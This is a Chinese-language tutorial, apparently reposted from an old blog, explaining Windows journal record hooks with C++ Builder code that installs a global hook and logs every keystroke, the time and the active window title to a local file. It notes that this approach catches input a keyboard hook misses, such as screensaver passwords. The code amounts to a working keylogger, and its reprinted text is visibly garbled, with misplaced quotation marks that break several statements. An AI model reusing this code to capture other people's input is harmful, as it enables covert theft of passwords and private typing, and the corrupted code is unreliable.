-- 鉤子是WINDOWS中消息處理機制的一個要點，通過安裝各種鉤子，應用程序能夠設(shè)置相應的子例程來監(jiān)視系統(tǒng)里的消息傳遞以及在這些消息到達目標窗口程序之前處理它們。鉤子的種類很多，每種鉤子可以截獲并處理相應的消息，如鍵盤鉤子可以截獲鍵盤消息，鼠標鉤子可以截獲鼠標消息，外殼鉤子可以截獲啟動和關(guān)閉應用程序的消息，日志鉤子可以監(jiān)視和記錄輸入事件。鉤子分為線程專用鉤子和全局鉤子，線程專用鉤子只監(jiān)視指定的線程，要監(jiān)視系統(tǒng)中的所有線程，必須用到全局鉤子。對于全局鉤子，鉤子函數(shù)必須包含在獨立的動態(tài)鏈接庫(DLL)中，這樣才能被各種相關(guān)聯(lián)的應用程序調(diào)用。在WINDOWS中，日志鉤子是個很特別的鉤子，它只有全局鉤子一種，是鍵盤鼠標等輸入設(shè)備的消息在系統(tǒng)消息隊列被取出時發(fā)生的，而且系統(tǒng)中只能存在一個這樣的日志鉤子，更重要是，它不必用在動態(tài)鏈接庫中，這樣可以省卻了為安裝一個全局鉤子而建立一個動態(tài)鏈接庫的麻煩。利用日志鉤子，我們可以監(jiān)視各種輸入事件，下面的示例可以用來記錄鍵盤的輸入，當有按鍵發(fā)生時，自動記錄按鍵動作的日期和時間以及當前激活的窗口名稱。本示例在中文WIN98，Borland C++ Builder4中編譯通過。

---- 1．新建一個工程，在窗體Form1中放置兩個按鈕Button1和Button2, CAPTION分別 為“安裝日志鉤子”和“卸載日志鉤子”。

---- 2． 定義如下全局變量：

HHOOK g_hLogHook=NULL; //鉤子變量 HWND g_hLastFocus=NULL; //記錄上一次得到焦點的窗口句柄 const int KeyPressMask=0x80000000; //鍵盤掩碼常量 char g_PrvChar; //保存上一次按鍵值3．在Button1的OnClick事件中輸入：void __fastcall TForm1::Button1Click(TObject *Sender){if (g_hLogHook==NULL)g_hLogHook = SetWindowsHookEx (WH_JOURNALRECORD,(HOOKPROC)JournalLogProc, HInstance,0); //安裝日志鉤子}4．在Button2的OnClick事件中輸入：void __fastcall TForm1::Button2Click(TObject *Sender) {if (g_hLogHook!=NULL){UnhookWindowsHookEx(g_hLogHook);g_hLogHook=NULL;} //卸載日志鉤子 }5．輸入鉤子回調(diào)函數(shù)： HOOKPROC JournalLogProc(int iCode, WPARAM wParam, LPARAM lParam) {if (iCode<0) return (HOOKPROC)CallNextHookEx (g_hLogHook,iCode,wParam,lParam); if (iCode="=HC_ACTION)" {EVENTMSG *pEvt="(EVENTMSG" *)lParam; int i; HWND hFocus; //保存當前活動窗口句柄 char szTitle[256]; //當前窗口名稱 char szTime[128]; //保存當前的日期和時間 FILE *stream="fopen(“c:\\logfile.txt”,"a+t");" if (pEvt->message==WM_KEYDOWN) {int vKey=LOBYTE(pEvt- >paramL); // 取得虛擬鍵值char ch;char str[10];hFocus=GetActiveWindow(); //取得當前活動窗口句柄if(g_hLastFocus!=hFocus) //當前活動窗口是否改變{GetWindowText(hFocus,szTitle,256);g_hLastFocus=hFocus;strcpy(szTime,DateTimeToStr(Now()) .c_str()); //得到當前的日期時間fprintf(stream,"%c%s%c%c%s", 10,szTime,32,32,szTitle); //寫入文件fprintf(stream,"%c%c",32,32); }int iShift=GetKeyState(0x10); //測試SHIFT,CAPTION,NUMLOCK等鍵是否按下int iCapital=GetKeyState(0x14);int iNumLock=GetKeyState(0x90);bool bShift=(iShift & KeyPressMask)==KeyPressMask; bool bCapital=(iCapital & 1)==1;bool bNumLock=(iNumLock & 1)==1;if (vKey >=48 && vKey<=57) // 數(shù)字0-9 if (!bShift) fprintf(stream,"%c",vKey); if (vKey>=65 && vKey<=90) // A-Z a-z {if (!bCapital) if (bShift) ch="vKey;" else ch="vKey+32;" else if (bShift) ch="vKey+32;" else ch="vKey;" fprintf(stream,"%c",ch); } if (vKey>=96 && vKey<=105) // 小鍵盤0-9 if (bNumLock) fprintf(stream,"%c",vKey-96+48); if (vKey>=186 && vKey<=222) // 其他鍵 {switch (vKey) {case 186:if (!bShift) ch=";" ; else ch=":" ;break; case 187:if (!bShift) ch="=" ; else ch="+" ;break; case 188:if (!bShift) ch="," ; else ch="<" ;break; case 189:if (!bShift) ch="-" ; else ch="_" ;break; case 190:if (!bShift) ch="." ; else ch=" >" ;break; case 191:if (!bShift) ch="/" ; else ch="?" ;break; case 192:if (!bShift) ch="`" ; else ch="~" ;break; case 219:if (!bShift) ch="[" ; else ch="{" ;break; case 220:if (!bShift) ch="\\" ; else ch="|" ;break; case 221:if (!bShift) ch="]" ; else ch="}" ;break; case 222:if (!bShift) ch="\" '; else ch="\"" ;break; default:ch="n" ;break; } if (ch!="n" ) fprintf(stream,"%c",ch); } // if (wParam>=112 && wParam<=123) // 功能鍵 [F1]-[F12] if (vKey>=8 && vKey<=46) //方向鍵 {switch (vKey) {case 8:strcpy(str,"[BK]");break; case 9:strcpy(str,"[TAB]");break; case 13:strcpy(str,"[EN]");break; case 32:strcpy(str,"[SP]");break; case 33:strcpy(str,"[PU]");break; case 34:strcpy(str,"[PD]");break; case 35:strcpy(str,"[END]");break; case 36:strcpy(str,"[HOME]");break; case 37:strcpy(str,"[LF]");break; case 38:strcpy(str,"[UF]");break; case 39:strcpy(str,"[RF]");break; case 40:strcpy(str,"[DF]");break; case 45:strcpy(str,"[INS]");break; case 46:strcpy(str,"[DEL]");break; default:ch="n" ;break; } if (ch!="n" ) {if (g_PrvChar!="vKey)" {fprintf(stream,"%s",str); g_PrvChar="vKey;" } } } } if (pEvt->message==WM_LBUTTONDOWN || pEvt- >message ==WM_RBUTTONDOWN){hFocus=GetActiveWindow();if (g_hLastFocus!=hFocus){g_hLastFocus=hFocus;GetWindowText(hFocus,szTitle,256); strcpy(szTime,DateTimeToStr(Now()).c_str()); //得到當前的日期時間fprintf(stream,"%c%s%c%c%s", 10,szTime,32,32,szTitle); //寫入文件fprintf(stream,"%c%c",32,32); }}fclose(stream);return (HOOKPROC)CallNextHookEx (g_hLogHook,iCode,wParam,lParam); }

---- 將工程編譯執(zhí)行后，每當激活一個窗口時，就會把當前窗口名稱寫入文件c:\logfile.txt中，當有按鍵時，按鍵的名稱也會寫入此文件中，這里的并沒有處理全部的按鍵，讀者可根據(jù)需要添加相應的語句。要捕捉鍵盤的按鍵動作，用鍵盤鉤子(Keyboard Hook)也同樣可以實現(xiàn)，但是用日志鉤子卻比鍵盤鉤子要方便許多。首先，如果要捕捉其他應用程序的按鍵，即做成全局鉤子，鍵盤鉤子一定要單獨放在動態(tài)鏈接庫中，而日志鉤子卻不必；其次，在鍵盤鉤子函數(shù)得到的鍵盤按鍵之前，系統(tǒng)已經(jīng)處理過這些輸入了，如果系統(tǒng)把這些按鍵屏蔽掉，鍵盤鉤子就無法檢測到它們，例如，當輸入屏幕保護程序密碼時，鍵盤鉤子無法檢測到用戶輸入了那些字符，而日志鉤子卻可以檢測到。

---- 無論是哪種鉤子， 都會增加系統(tǒng)處理消息的時間，從而降低系統(tǒng)的性能，我們只有在必要的時候才安裝這些鉤子，而且盡可能在不需要時移走它們。

轉(zhuǎn)載于:https://www.cnblogs.com/henryzc/archive/2005/10/27/262990.html

總結(jié)

以上是生活随笔為你收集整理的日志钩子（JournalRecord Hook）的使用的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。